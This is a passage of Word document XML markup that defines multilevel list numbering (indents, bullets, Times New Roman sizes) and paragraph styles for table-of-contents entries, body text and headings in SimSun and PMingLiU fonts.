    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1523" w:hanging="493"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1523" w:hanging="493"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2123" w:hanging="598"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3558" w:hanging="598"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4277" w:hanging="598"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4996" w:hanging="598"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5715" w:hanging="598"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6434" w:hanging="598"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7153" w:hanging="598"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2120" w:hanging="596"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2120" w:hanging="596"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2120" w:hanging="596"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4061" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4708" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5355" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6002" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6649" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7296" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1525" w:hanging="495"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1525" w:hanging="495"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2120" w:hanging="596"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="-31"/>
        <w:w w:val="100"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3558" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4277" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4996" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5715" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6434" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7153" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1525" w:hanging="495"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1525" w:hanging="495"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2120" w:hanging="596"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="-31"/>
        <w:w w:val="99"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3558" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4277" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4996" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5715" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6434" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7153" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1523" w:hanging="493"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1523" w:hanging="493"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8083" w:hanging="493"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8146" w:hanging="493"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8210" w:hanging="493"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8273" w:hanging="493"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8337" w:hanging="493"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8400" w:hanging="493"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8464" w:hanging="493"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="332" w:hanging="130"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold" w:eastAsia="MS Office Symbol Bold" w:cs="MS Office Symbol Bold"/>
        <w:w w:val="36"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1165" w:hanging="130"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1990" w:hanging="130"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2815" w:hanging="130"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3640" w:hanging="130"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4465" w:hanging="130"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5290" w:hanging="130"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6115" w:hanging="130"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6940" w:hanging="130"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="0">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="356" w:hanging="154"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:w w:val="100"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1525" w:hanging="495"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2120" w:hanging="596"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2928" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3737" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4546" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5355" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6164" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6973" w:hanging="596"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="29">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="25"/>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8">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="26"/>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SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="TOC1" w:type="paragraph">
    <w:name w:val="TOC 1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="179"/>
      <w:ind w:left="954"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:cs="PMingLiU"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="TOC2" w:type="paragraph">
    <w:name w:val="TOC 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="56"/>
      <w:ind w:left="1523" w:hanging="492"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="TOC3" w:type="paragraph">
    <w:name w:val="TOC 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="55"/>
      <w:ind w:left="1523" w:hanging="492"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="TOC4" w:type="paragraph">
    <w:name w:val="TOC 4"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="81"/>
      <w:ind w:left="2120" w:hanging="595"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="TOC5" w:type="paragraph">
    <w:name w:val="TOC 5"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="271"/>
      <w:ind w:left="2696"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="BodyText" w:type="paragraph">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading1" w:type="paragraph">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="310"/>
      <w:ind w:left="203"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:cs="PMingLiU"/>
      <w:sz w:val="50"/>
      <w:szCs w:val="50"/>
    </w:rPr>
  </w:style>
  <w:style w:styleId="Heading2" w:type="paragraph">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
